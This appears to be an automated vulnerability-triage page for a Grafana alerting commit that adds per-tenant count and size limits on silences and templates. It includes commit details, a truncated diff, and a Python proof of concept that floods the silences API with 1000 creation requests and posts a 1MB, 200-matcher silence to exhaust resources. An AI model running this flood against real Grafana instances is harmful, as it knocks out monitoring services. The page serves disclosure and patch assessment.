Denial of Service (resource exhaustion)

MEDIUM

grafana/grafana

Commit: 6c53264c2c58

Affected: Versions prior to Grafana 12.4.0 (e.g., 12.3.x and earlier)

2026-04-03 21:36 UTC

Description

The commit adds tenant-scoped limits validation for alerting templates and silences by introducing a LimitsProvider (Noop and Remote) and wiring it into the template and silence services. The goal is to prevent resource exhaustion/DoS by enforcing count and size limits on templates and silences, especially when syncing config to remote alertmanager. It also introduces fail-open behavior if the remote limits endpoint is unavailable or returns an error (i.e., it will not block operation in degraded conditions). This is a hardening fix for denial-of-service scenarios that could arise from abuse of template/silence creation and updates, particularly in multi-tenant environments with remote alertmanager configurations. The changes are more than a minor cleanup: they implement new logic for limits enforcement and wiring, and include API-facing behavior changes (SilenceLimitsProvider exposure) to enforce these limits.

Proof of Concept

PoC: Demonstrate potential DoS due to unlimited template/silence creation prior to this fix

Prerequisites:
- Grafana instance (version 12.3.x or earlier) with alerting enabled and support for silences/templates; multi-tenant setup; ability to create silences via API; API token with appropriate permissions.
- Optional: remote alertmanager integration disabled, misconfigured, or reachable depending on test scenario.

Goal: Show resource exhaustion (DoS) via mass creation of silences or extremely large silences when limits are not enforced.

Attack surface (before fix): unlimited creation of silences/templates or oversized payloads can consume memory, CPU, and storage, potentially causing degraded performance or service outages, especially under high-velocity or multi-tenant workloads.

PoC Scenario 1 — Flood silences to exhaust resources (typical DoS via mass creation):
- Use Grafana API to repeatedly create silences in a short time.
- Each request creates a minimal silence; the sum of many silences taxes memory/processing and may impact alertmanager syncing.
- Expected result before fix: high rate of Silences created, increased resource usage, potential 429/500 responses if rate-limited is not in place, or eventual service degradation.

Python (conceptual; endpoints may vary by version):

import os, time, requests
GRAFANA_BASE = os.environ.get("GRAFANA_BASE", "http://localhost:3000")
API_TOKEN = os.environ.get("GRAFANA_TOKEN")
HEADERS = {"Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json"}

silence_payload = {
    "comment": "poc-doS",
    "createdBy": "tester",
    # times should be valid; short window to accelerate impact
    "startsAt": "2026-01-01T00:00:00Z",
    "endsAt":   "2026-01-02T00:00:00Z",
    "matchers": [ {"name": "alertname", "value": "TestAlert", "isRegex": False} ]
}

# Endpoint may be /api/alerting/silences or /api/alerts/silences depending on version
endpoints = [
    f"{GRAFANA_BASE}/api/alerting/silences",
    f"{GRAFANA_BASE}/api/alerts/silences",
]

def create_silence(url):
    payload = {"silence": silence_payload}
    r = requests.post(url, json=payload, headers=HEADERS, timeout=5)
    return r.status_code

for i in range(1000):  # adjust range to test local capacity
    for url in endpoints:
        try:
            code = create_silence(url)
            print(i, url, code)
        except Exception as e:
            print(i, url, "ERR", e)
    time.sleep(0.05)  # rapid bursts; adjust as needed

# Expected result: high throughput of creation requests leading to rising memory/CPU usage on Grafana side in pre-fix versions.

PoC Scenario 2 — Create oversized silences to test size validation (if unpatched):
- Craft a single silence with an extremely large comment and a large number of matchers to exceed any potential size limit.
- Observe server response: before fix, large payloads may be accepted and consume resources; after fix, a 400/413 error or a limit-exceeded response is expected.

payload_large = {
    "silence": {
        "comment": "x" * 1000000,  # 1MB comment as stress test
        "createdBy": "tester",
        "startsAt": "2026-01-01T00:00:00Z",
        "endsAt": "2026-01-02T00:00:00Z",
        "matchers": [{"name": f"m{i}", "value": "v", "isRegex": False} for i in range(200)]
    }
}
# POST this payload to the same endpoints and observe behavior.

Note: This PoC targets the pre-fix behavior where limits enforcement was not yet in place. After applying the fix, the API would either reject oversized payloads or enforce a per-tenant cap, making the PoC harmful behavior blocked or significantly mitigated. Execute PoC only in a controlled test environment with proper authorization and authorization headers.

Commit Details

Author: William Wernert

Date: 2026-03-13 14:55 UTC

Message:

Alerting: Add limits validation for templates and silences (#116787)

* Alerting: Add limits validation for templates and silences

Fetch tenant-scoped limits from remote alertmanager before allowing
template or silence creation/updates. This prevents sync failures when
the config is later pushed to the remote alertmanager.

- Add GetLimits() to MimirClient to call GET /api/v1/limits
- Add LimitsProvider interface with Noop and Remote implementations
- Validate count limits on create, size limits on create and update
- Fail open if limits endpoint unavailable or returns error

* Refactor template service to use WithLimitsProvider pattern

This change restructures how limits are applied to the template service
to avoid merge conflicts with security patches. Instead of passing the
limits provider as a constructor parameter, we now use a builder pattern
with WithLimitsProvider() method, similar to WithIncludeImported().

This keeps the NewTemplateService() signature unchanged, allowing
security patches that use these lines as context to apply cleanly.

Triage Assessment

Vulnerability Type: Denial of Service (resource exhaustion)

Confidence: MEDIUM

Reasoning:

The commit adds tenant-scoped limits validation for templates and silences and introduces a limits provider to enforce count/size limits. This mitigates potential abuse that could lead to resource exhaustion or denial of service in alerting, which is a security hardening improvement. It also introduces fallbacks (fail open) if limits endpoint is unavailable, which is a design trade-off but still aims to prevent misuse.

Verification Assessment

Vulnerability Type: Denial of Service (resource exhaustion)

Confidence: MEDIUM

Affected Versions: Versions prior to Grafana 12.4.0 (e.g., 12.3.x and earlier)

Code Diff

diff --git a/pkg/services/ngalert/api/api.go b/pkg/services/ngalert/api/api.go
index d2ac5cd4768de..8628759eba997 100644
--- a/pkg/services/ngalert/api/api.go
+++ b/pkg/services/ngalert/api/api.go
@@ -54,38 +54,39 @@ type RuleAccessControlService interface {
 
 // API handlers.
 type API struct {
-	Cfg                  *setting.Cfg
-	DatasourceCache      datasources.CacheService
-	DatasourceService    datasources.DataSourceService
-	RouteRegister        routing.RouteRegister
-	QuotaService         quota.Service
-	TransactionManager   provisioning.TransactionManager
-	ProvenanceStore      provisioning.ProvisioningStore
-	RuleStore            RuleStore
-	AlertingStore        store.AlertingStore
-	AdminConfigStore     store.AdminConfigurationStore
-	DataProxy            *datasourceproxy.DataSourceProxyService
-	MultiOrgAlertmanager *notifier.MultiOrgAlertmanager
-	StateManager         state.AlertInstanceManager
-	RuleStatusReader     apiprometheus.StatusReader
-	AccessControl        ac.AccessControl
-	ReceiverService      *notifier.ReceiverService
-	ReceiverTestService  *notifier.ReceiverTestingService
-	RouteService         *routes.Service
-	Policies             *provisioning.NotificationPolicyService
-	ContactPointService  *provisioning.ContactPointService
-	Templates            *provisioning.TemplateService
-	MuteTimings          *provisioning.MuteTimingService
-	InhibitionRules      *inhibition_rules.Service
-	AlertRules           *provisioning.AlertRuleService
-	AlertsRouter         *sender.AlertsRouter
-	EvaluatorFactory     eval.EvaluatorFactory
-	ConditionValidator   *eval.ConditionValidator
-	FeatureManager       featuremgmt.FeatureToggles
-	Historian            Historian
-	Tracer               tracing.Tracer
-	AppUrl               *url.URL
-	UserService          user.Service
+	Cfg                   *setting.Cfg
+	DatasourceCache       datasources.CacheService
+	DatasourceService     datasources.DataSourceService
+	RouteRegister         routing.RouteRegister
+	QuotaService          quota.Service
+	TransactionManager    provisioning.TransactionManager
+	ProvenanceStore       provisioning.ProvisioningStore
+	RuleStore             RuleStore
+	AlertingStore         store.AlertingStore
+	AdminConfigStore      store.AdminConfigurationStore
+	DataProxy             *datasourceproxy.DataSourceProxyService
+	MultiOrgAlertmanager  *notifier.MultiOrgAlertmanager
+	StateManager          state.AlertInstanceManager
+	RuleStatusReader      apiprometheus.StatusReader
+	AccessControl         ac.AccessControl
+	ReceiverService       *notifier.ReceiverService
+	ReceiverTestService   *notifier.ReceiverTestingService
+	RouteService          *routes.Service
+	Policies              *provisioning.NotificationPolicyService
+	ContactPointService   *provisioning.ContactPointService
+	Templates             *provisioning.TemplateService
+	MuteTimings           *provisioning.MuteTimingService
+	InhibitionRules       *inhibition_rules.Service
+	AlertRules            *provisioning.AlertRuleService
+	AlertsRouter          *sender.AlertsRouter
+	EvaluatorFactory      eval.EvaluatorFactory
+	ConditionValidator    *eval.ConditionValidator
+	FeatureManager        featuremgmt.FeatureToggles
+	Historian             Historian
+	Tracer                tracing.Tracer
+	AppUrl                *url.URL
+	UserService           user.Service
+	SilenceLimitsProvider notifier.LimitsProvider
 
 	// Hooks can be used to replace API handlers for specific paths.
 	Hooks *Hooks
@@ -127,6 +128,7 @@ func (api *API) RegisterAPIEndpoints(m *metrics.API) {
 				api.MultiOrgAlertmanager,
 				api.RuleStore,
 				ruleAuthzService,
+				api.SilenceLimitsProvider,
 			),
 			receiverAuthz: accesscontrol.NewReceiverAccess[ReceiverStatus](api.AccessControl, false),
 		},

diff --git a/pkg/services/ngalert/api/api_alertmanager_test.go b/pkg/services/ngalert/api/api_alertmanager_test.go
index c8f4f2f7e9ee1..bc50bf09168a2 100644
--- a/pkg/services/ngalert/api/api_alertmanager_test.go
+++ b/pkg/services/ngalert/api/api_alertmanager_test.go
@@ -582,7 +582,7 @@ func createSut(t *testing.T) AlertmanagerSrv {
 		ac:             ac,
 		log:            log,
 		featureManager: featuremgmt.WithFeatures(),
-		silenceSvc:     notifier.NewSilenceService(accesscontrol.NewSilenceService(ac, ruleStore), ruleStore, log, mam, ruleStore, ruleAuthzService),
+		silenceSvc:     notifier.NewSilenceService(accesscontrol.NewSilenceService(ac, ruleStore), ruleStore, log, mam, ruleStore, ruleAuthzService, nil),
 	}
 }
 

diff --git a/pkg/services/ngalert/ngalert.go b/pkg/services/ngalert/ngalert.go
index 9c73ff62d4047..5437cbf950dfb 100644
--- a/pkg/services/ngalert/ngalert.go
+++ b/pkg/services/ngalert/ngalert.go
@@ -477,10 +477,43 @@ func (ng *AlertNG) init() error {
 		false, // imported resources are not exposed via provisioning APIs
 	)
 
+	// Create limits provider based on alertmanager mode.
+	// The provider is used for both template and silence limit validation.
+	// Both provisioning.LimitsProvider and notifier.LimitsProvider interfaces have identical
+	// signatures, so NoopLimitsProvider and RemoteLimitsProvider satisfy both via structural typing.
+	var limitsProvider provisioning.LimitsProvider
+	if remotePrimary || remoteSecondary || remoteSecondaryWithRemoteState {
+		// For remote alertmanager, create a MimirClient to fetch limits
+		remoteURL, err := url.Parse(ng.Cfg.UnifiedAlerting.RemoteAlertmanager.URL)
+		if err != nil {
+			ng.Log.Warn("Failed to parse remote alertmanager URL for limits provider, using noop limits", "error", err)
+			limitsProvider = &provisioning.NoopLimitsProvider{}
+		} else {
+			mimirCfg := &remoteClient.Config{
+				URL:      remoteURL,
+				TenantID: ng.Cfg.UnifiedAlerting.RemoteAlertmanager.TenantID,
+				Password: ng.Cfg.UnifiedAlerting.RemoteAlertmanager.Password,
+				Logger:   log.New("ngalert.remote.limits"),
+				Timeout:  ng.Cfg.UnifiedAlerting.RemoteAlertmanager.Timeout,
+			}
+			mimirClient, err := remoteClient.New(mimirCfg, ng.Metrics.GetRemoteAlertmanagerMetrics(), ng.tracer)
+			if err != nil {
+				ng.Log.Warn("Failed to create MimirClient for limits provider, using noop limits", "error", err)
+				limitsProvider = &provisioning.NoopLimitsProvider{}
+			} else {
+				limitsProvider = provisioning.NewRemoteLimitsProvider(mimirClient)
+			}
+		}
+	} else {
+		// For local alertmanager, skip limit validation (limits are enforced at runtime by the alerting library)
+		limitsProvider = &provisioning.NoopLimitsProvider{}
+	}
+
 	// Provisioning
 	policyService := provisioning.NewNotificationPolicyService(configStore, ng.store, ng.store, ng.Cfg.UnifiedAlerting, ng.Log)
 	contactPointService := provisioning.NewContactPointService(configStore, ng.SecretsService, ng.store, ng.store, provisioningReceiverService, ng.Log, ng.store, ng.ResourcePermissions)
 	templateService := provisioning.NewTemplateService(configStore, ng.store, ng.store, ng.Log)
+	templateServiceWithLimits := templateService.WithLimitsProvider(limitsProvider)
 	muteTimingService := provisioning.NewMuteTimingService(configStore, ng.store, ng.store, ng.Log, ng.store, routeService)
 	inhibitionRuleService := inhibition_rules.NewService(configStore, ng.Log, ng.FeatureToggles)
 	alertRuleService := provisioning.NewAlertRuleService(ng.store, ng.store, ng.folderService, ng.QuotaService, ng.store,
@@ -490,39 +523,40 @@ func (ng *AlertNG) init() error {
 		ac.NewRuleService(ng.accesscontrol))
 
 	ng.Api = &api.API{
-		Cfg:                  ng.Cfg,
-		DatasourceCache:      ng.DataSourceCache,
-		DatasourceService:    ng.DataSourceService,
-		RouteRegister:        ng.RouteRegister,
-		DataProxy:            ng.DataProxy,
-		QuotaService:         ng.QuotaService,
-		TransactionManager:   ng.store,
-		RuleStore:            ng.store,
-		AlertingStore:        ng.store,
-		AdminConfigStore:     ng.store,
-		ProvenanceStore:      ng.store,
-		MultiOrgAlertmanager: ng.MultiOrgAlertmanager,
-		StateManager:         apiStateManager,
-		RuleStatusReader:     apiStatusReader,
-		AccessControl:        ng.accesscontrol,
-		Policies:             policyService,
-		RouteService:         routeService,
-		ReceiverService:      receiverService,
-		ReceiverTestService:  receiverTestService,
-		ContactPointService:  contactPointService,
-		Templates:            templateService,
-		MuteTimings:          muteTimingService,
-		InhibitionRules:      inhibitionRuleService,
-		AlertRules:           alertRuleService,
-		AlertsRouter:         alertsRouter,
-		EvaluatorFactory:     evalFactory,
-		ConditionValidator:   conditionValidator,
-		FeatureManager:       ng.FeatureToggles,
-		AppUrl:               appUrl,
-		Historian:            history,
-		Hooks:                api.NewHooks(ng.Log),
-		Tracer:               ng.tracer,
-		UserService:          ng.userService,
+		Cfg:                   ng.Cfg,
+		DatasourceCache:       ng.DataSourceCache,
+		DatasourceService:     ng.DataSourceService,
+		RouteRegister:         ng.RouteRegister,
+		DataProxy:             ng.DataProxy,
+		QuotaService:          ng.QuotaService,
+		TransactionManager:    ng.store,
+		RuleStore:             ng.store,
+		AlertingStore:         ng.store,
+		AdminConfigStore:      ng.store,
+		ProvenanceStore:       ng.store,
+		MultiOrgAlertmanager:  ng.MultiOrgAlertmanager,
+		StateManager:          apiStateManager,
+		RuleStatusReader:      apiStatusReader,
+		AccessControl:         ng.accesscontrol,
+		Policies:              policyService,
+		RouteService:          routeService,
+		ReceiverService:       receiverService,
+		ReceiverTestService:   receiverTestService,
+		ContactPointService:   contactPointService,
+		Templates:             templateServiceWithLimits,
+		MuteTimings:           muteTimingService,
+		InhibitionRules:       inhibitionRuleService,
+		AlertRules:            alertRuleService,
+		AlertsRouter:          alertsRouter,
+		EvaluatorFactory:      evalFactory,
+		ConditionValidator:    conditionValidator,
+		FeatureManager:        ng.FeatureToggles,
+		AppUrl:                appUrl,
+		Historian:             history,
+		Hooks:                 api.NewHooks(ng.Log),
+		Tracer:                ng.tracer,
+		UserService:           ng.userService,
+		SilenceLimitsProvider: limitsProvider,
 	}
 	ng.Api.RegisterAPIEndpoints(ng.Metrics.GetAPIMetrics())
 

diff --git a/pkg/services/ngalert/notifier/multiorg_alertmanager.go b/pkg/services/ngalert/notifier/multiorg_alertmanager.go
index f10147ad9518f..b2b7823b5cca1 100644
--- a/pkg/services/ngalert/notifier/multiorg_alertmanager.go
+++ b/pkg/services/ngalert/notifier/multiorg_alertmanager.go
@@ -42,9 +42,11 @@ var (
 	ErrAlertmanagerNotFound = errutil.NotFound("alerting.notifications.alertmanager.notFound")
 	ErrAlertmanagerConflict = errutil.Conflict("alerting.notifications.alertmanager.conflict")
 
-	ErrSilenceNotFound    = errutil.NotFound("alerting.notifications.silences.notFound")
-	ErrSilencesBadRequest = errutil.BadRequest("alerting.notifications.silences.badRequest")
-	ErrSilenceInternal    = errutil.Internal("alerting.notifications.silences.internal")
+	ErrSilenceNotFound      = errutil.NotFound("alerting.notifications.silences.notFound")
+	ErrSilencesBadRequest   = errutil.BadRequest("alerting.notifications.silences.badRequest")
+	ErrSilenceInternal      = errutil.Internal("alerting.notifications.silences.internal")
+	ErrSilenceLimitExceeded = errutil.TooManyRequests("alerting.notifications.silences.limitExceeded", errutil.WithPublicMessage("Maximum number of silences has been reached. Delete some silences before creating new ones."))
+	ErrSilenceSizeExceeded  = errutil.BadRequest("alerting.notifications.silences.sizeExceeded", errutil.WithPublicMessage("Silence size exceeds the maximum allowed size."))
 )
 
 //go:generate mockery --name Alertmanager --structname AlertmanagerMock --with-expecter --output alertmanager_mock --outpkg alertmanager_mock

diff --git a/pkg/services/ngalert/notifier/silence_svc.go b/pkg/services/ngalert/notifier/silence_svc.go
index aab960a4bcd37..536a2968ccab7 100644
--- a/pkg/services/ngalert/notifier/silence_svc.go
+++ b/pkg/services/ngalert/notifier/silence_svc.go
@@ -2,6 +2,7 @@ package notifier
 
 import (
 	"context"
+	"encoding/json"
 
 	"golang.org/x/exp/maps"
 
@@ -10,16 +11,24 @@ import (
 	"github.com/grafana/grafana/pkg/apimachinery/identity"
 	"github.com/grafana/grafana/pkg/infra/log"
 	"github.com/grafana/grafana/pkg/services/ngalert/models"
+	"github.com/grafana/grafana/pkg/services/ngalert/remote/client"
 )
 
+// LimitsProvider provides access to alertmanager limits for validation.
+type LimitsProvider interface {
+	// GetLimits retrieves the current limits. Returns nil limits (not an error) if limits are not configured.
+	GetLimits(ctx context.Context) (*client.TenantLimits, error)
+}
+
 // SilenceService is the authenticated service for managing alertmanager silences.
 type SilenceService struct {
-	authz     SilenceAccessControlService
-	xact      transactionManager
-	log       log.Logger
-	store     SilenceStore
-	ruleStore RuleStore
-	ruleAuthz RuleAccessControlService
+	authz          SilenceAccessControlService
+	xact           transactionManager
+	log            log.Logger
+	store          SilenceStore
+	ruleStore      RuleStore
+	ruleAuthz      RuleAccessControlService
+	limitsProvider LimitsProvider
 }
 
 type RuleAccessControlService interface {
@@ -56,14 +65,16 @@ func NewSilenceService(
 	store SilenceStore,
 	ruleStore RuleStore,
 	ruleAuthz RuleAccessControlService,
+	limitsProvider LimitsProvider,
 ) *SilenceService {
 	return &SilenceService{
-		authz:     authz,
-		xact:      xact,
-		log:       log,
-		store:     store,
-		ruleStore: ruleStore,
-		ruleAuthz: ruleAuthz,
+		authz:          authz,
+		xact:           xact,
+		log:            log,
+		store:          store,
+		ruleStore:      ruleStore,
+		ruleAuthz:      ruleAuthz,
+		limitsProvider: limitsProvider,
 	}
 }
 
@@ -100,6 +111,11 @@ func (s *SilenceService) CreateSilence(ctx context.Context, user identity.Reques
 		return "", err
 	}
 
+	// Validate limits before creating
+	if err := s.validateSilenceLimits(ctx, user.GetOrgID(), ps, true); err != nil {
+		return "", err
+	}
+
 	silenceId, err := s.store.CreateSilence(ctx, user.GetOrgID(), ps)
 	if err != nil {
 		return "", err
@@ -125,6 +141,11 @@ func (s *SilenceService) UpdateSilence(ctx context.Context, user identity.Reques
 		return "", err
 	}
 
+	// Validate size limits before updating (count validation not needed for updates)
+	if err := s.validateSilenceLimits(ctx, user.GetOrgID(), ps, false); err != nil {
+		return "", err
+	}
+
 	silenceId, err := s.store.UpdateSilence(ctx, user.GetOrgID(), ps)
 	if err != nil {
 		return "", err
@@ -254,3 +275,57 @@ func validateSilenceUpdate(existing *models.Silence, new models.Silence) error {
 
 	return nil
 }
+
+// validateSilenceLimits checks if creating or updating a silence would exceed configured limits.
+// orgID is the organization ID to fetch silences for count
... [truncated]

← Back to Alerts View on GitHub →